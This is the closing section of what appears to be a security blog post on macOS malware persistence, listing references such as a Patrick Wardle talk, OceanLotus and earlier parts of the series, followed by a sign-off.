Patrick Wardle. Methods of Malware Persistence on MacOS X
OceanLotus
macOS hacking part 1
macOS persistence part 1
macOS persistence part 6
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine